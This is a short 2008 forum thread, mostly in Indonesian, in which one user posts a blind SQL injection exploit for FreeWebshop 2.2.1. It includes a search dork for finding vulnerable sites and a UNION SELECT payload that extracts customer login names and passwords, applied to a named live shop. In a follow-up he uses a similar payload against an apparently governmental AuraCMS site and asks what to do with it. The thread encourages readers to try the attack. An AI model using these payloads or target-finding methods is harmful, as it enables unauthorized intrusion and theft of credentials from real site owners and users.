:: SMPN 7 BANDUNG STUDENT COMMUNITY ::
Would you like to react to this message? Create an account in a few clicks or log in to continue.

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Go down

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit Empty FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n Thu Feb 21, 2008 4:17 pm

google dork: "Powered by FreeWebshop.org 2.2.1"
contohwebsite: http://www.atelierinderoos.nl/
bug: index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

====
jadi
http://www.atelierinderoos.nl/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION

===
keterangan lengkap di
http://milw0rm.com/exploits/4740

maap bug lama tapi enak ni blind sql injection
===
selamat mencoba
juniorsev3n
juniorsev3n
Archxecutor

Jumlah posting : 145
Age : 30
Location : Bandung Underground
Registration date : 23.01.08

http://juniorsev3n.co.cc

Kembali Ke Atas Go down

FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit Empty Re: FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit

Post by juniorsev3n Thu Feb 21, 2008 4:52 pm

aduh
aura cms
dapet euy

http://www.banjar-jabar.go.id/redesign/index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1/*

situs pemerintah tuh?
mau diapain>
juniorsev3n
juniorsev3n
Archxecutor

Jumlah posting : 145
Age : 30
Location : Bandung Underground
Registration date : 23.01.08

http://juniorsev3n.co.cc

Kembali Ke Atas Go down

Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik